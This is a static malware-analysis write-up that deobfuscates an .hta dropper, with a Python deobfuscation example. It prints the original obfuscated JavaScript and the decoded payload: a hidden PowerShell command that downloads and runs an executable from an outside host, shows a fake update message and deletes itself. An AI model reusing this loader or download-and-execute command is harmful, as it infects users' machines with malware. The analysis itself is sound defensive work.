hta Malware analysis

shamooo
Published in InfoSec Write-ups
3 min read · Oct 16, 2022

In this writeup, we will be looking at an hta malware file, and see some of the deobfuscation techniques we can use to make sense of the obfuscated code. In other words, let’s do some good old-fashioned static malware analysis.

<script>var wyyqbu='tarjya d{x mmaomvveqTioh(j-c1b0e0r,j-v1t0c0r)d;przeismirzfeeTnof(o0n,j0l)a;j xav=angedwk jAecotbiovjeuXrObbxjheacgtt(s\'lWxsfcrrlitpatw.tSkhueplklb\'t)v;k yaj.lRmutnf(e"uPdolwvejreSnhveclslm n-lWmiknfdxoewvSitfyoldeq mHmicdzdfehnd a$ldp=v$ueunivq:wtbecmjpn+p\'t\s\m4yao2u9e2c4y8v0o8lfx6n6r9e8r5rdqeg3mal9bavdb1xew3ddh7j4s3bec0fdz.qeaxeet\'y;z(hNjewwv-a';var nhm='Obbnjsescute dSvyzsetsewmh.zNfeata.iWgeabzChleisefnetz)p.bDvoqwdniliovacdnFyixlnec(q\'j khqtptlpqsx:r/r/wayhvtoaeeaeoruebdjdkifts.toarvgg/y1t7t/b5j2d4m.zdsaxtq\'p,p$hdm)o;dSbtsadrptn-fPzrxokcrerslsm y$jdf;s[lSpyvsxtoenmu.fRdejfmlpeycptqiqotng.dAysfsbejmxbtluyk]r:e:qLjopafdeWniutshiPzavrstlilaqlbNbagmueh(k\'tSnymsctkefmx.uWwibnkdgorwqsk.fFkodrnmksz\'f';var ohwrpi=')v;k[vswylsctretmn.kwgiznndroewksl.afmowrgmesm.rmjexsvsxahguecbdoexy]a:q:bsrhjoowb(q\'nUpphdrazttes mcqozmqpclreataem.y\'h,g\'bIknkfzolrbmaactlipoenb\'c,t[jWuitnddmofwtsm.wFwodrxmwsp.vMeewswspahgweaBiowxcBtumthtvoonbse]i:u:hOvKa,a h[xSxylsutteamp.yWwimnndeoiwnsm.fFqogrrmysb.gMzefsosuangkevBoosxsIlcdomnf]d:c:dIanpfrofrxmeartdivoxnu)t;y"a,t0e,pfnaslzsi';var uzite='eg)s;avsavrn ybz=qnbeawg tAfcdtxiwvgetXuObbnjteccgtx(r\'uSqcrrciwpjtdipnfgr.nFeiilpeeSoyisjtsegmgOzbajbeacntu\'c)u;svuaori mpr f=v vduoacnuhmfevnxtj.klgotccamtaicomnb.dharwegfu;opa i=w nuznbeisvcwajpiee(ppe.bszuobhsstrru(t8t)g)v;xihfr d(bbf.eFjiclrejEdxaiesztksn(dpz)r)fby.fDmerlxehtkerFnifloeu(wpr)w;c v}g ecmapticnhu i(xeh)m w{z}r uceleolscel(w)t;z';var vpropt=' b';var ujqffvih=wyyqbu+nhm+ohwrpi+uzite+vpropt; var gbakdvjuy=""; var kyhbqlqmmr=2; var a=0; while(a<ujqffvih.length){ gbakdvjuy +=ujqffvih.charAt(a);a +=kyhbqlqmmr; }; bztjfyeogy="ev".concat("al"); window[bztjfyeogy](gbakdvjuy); </script>

Looks like we are working with some heavily obfuscated JavaScript. To make the code easier to analyze, let's first copy it to a new file and save it with a .js extension for syntax highlighting, then beautify it a little.

Sort of beautified

OK, that's a little better, but it still doesn't make much sense. Looking at the code, we can see five string variables declared at the beginning, and later, on line 13, they are all concatenated. We can rename these variables to make this clearer.

In the next section, there are some more variable declarations and a while loop.

If we take a closer look at the logic, we can guess that the variable "gbakdvjuy", which is defined as an empty string, is used to build the deobfuscated payload.

The variable "kyhbqlqmmr" seems to be the increment size, which in our case is two (2), and "a" seems to be the counter, initialized at 0.

Let’s go ahead and rename these variables as well.

The while loop is pretty simple. It walks through concatenatedString, which was built by combining the first 4 variables, and appends every second character to our new variable, payload.

We can run the code up to this point and print out the final value of the variable payload.

try { moveTo(-100,-100);resizeTo(0,0); a=new ActiveXObject('Wscript.Shell'); a.Run("PowerShell -WindowStyle Hidden $d=$env:temp+'s4a2924808f66985de3a9ad1e3d743e0d.exe';(New-Object System.Net.WebClient).DownloadFile(' https://ahtaeereddit.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);",0,false);var b=new ActiveXObject('Scripting.FileSystemObject');var p = document.location.href;p = unescape(p.substr(8));if (b.FileExists(p))b.DeleteFile(p); } catch (e) {} close();
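The same recovery can be done statically, without ever evaluating the script. The following Python is an added example, not the author's code, and the .hta snippet embedded in it is a constructed stand-in that uses the same scheme (string pieces, concatenation, every-second-character loop) rather than the real sample. It resolves the JS escapes first, which matters here: the `\'` sequences become a single quote character before the loop runs, so the quote lands on the expected index.

```python
import re

# Constructed sample in the style of the page's .hta (not the real malware's
# strings): the payload is split across single-quoted string variables,
# concatenated, and every second character is kept; the rest is junk.
# The \' escapes are resolved by a JS parser before the loop runs, so each
# quote occupies exactly one index of the runtime string.
SAMPLE_HTA = r"""<script>var q1='WxSzcqrwiepxtk.aEbcphfoq(g\'kHoeelwljog';var q2=' hhmtqas\'b)z;f';
var q3=q1+q2; var out=""; var step=2; var a=0;
while(a<q3.length){ out +=q3.charAt(a);a +=step; }; window["ev".concat("al")](out); </script>"""

# var name='...';  (escapes such as \' allowed inside the literal)
STRING_RE = re.compile(r"var\s+(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")
# var name=part1+part2+...;
CONCAT_RE = re.compile(r"var\s+(\w+)\s*=\s*(\w+(?:\s*\+\s*\w+)+)\s*;")
# var name=<integer>;  (stride and counter start value)
INT_RE = re.compile(r"var\s+(\w+)\s*=\s*(\d+)\s*;")
# x.charAt(counter); counter += step;
LOOP_RE = re.compile(r"charAt\((\w+)\)\s*;\s*\1\s*\+=\s*(\w+)")


def js_unescape(literal: str) -> str:
    # Resolve single-character escapes the way a JS parser does for a
    # single-quoted literal (\' -> ', \s -> s). Multi-character escapes such
    # as \x41 or \u0041 are not handled by this simplified version.
    return re.sub(r"\\(.)", r"\1", literal)


def deobfuscate(script: str) -> str:
    """Recover the payload by re-implementing the loop, never by eval."""
    strings = {name: js_unescape(body) for name, body in STRING_RE.findall(script)}
    concat = CONCAT_RE.search(script)
    loop = LOOP_RE.search(script)
    if concat is None or loop is None:
        raise ValueError("script does not match the concat-and-stride pattern")
    parts = re.split(r"\s*\+\s*", concat.group(2))
    joined = "".join(strings[p] for p in parts)  # KeyError: unknown piece name
    ints = {name: int(val) for name, val in INT_RE.findall(script)}
    counter, step = loop.group(1), loop.group(2)
    start = ints.get(counter, 0)            # 'var a=0;'
    stride = ints[step] if step in ints else int(step)  # 'var step=2;'
    return joined[start::stride]


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_HTA))  # WScript.Echo('Hello hta');
```

The regexes match the variable, concatenation and loop shapes used in the sample above, so the same function can be pointed at the real script once its quotes are straight ASCII quotes.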

Since the original file was an HTML Application (.hta) file, mshta.exe would be used as a proxy to execute this script.

We can see that our 'malicious.hta' file spawns the PowerShell executable upon execution.

The name of the dropped malware file is "s4a2924808f66985de3a9ad1e3d743e0d.exe", and the full web address from which the malicious JavaScript in malware.hta tries to download the .dat file is "https://ahtaeereddit.org/17/524.dat".

Happy Hacking!
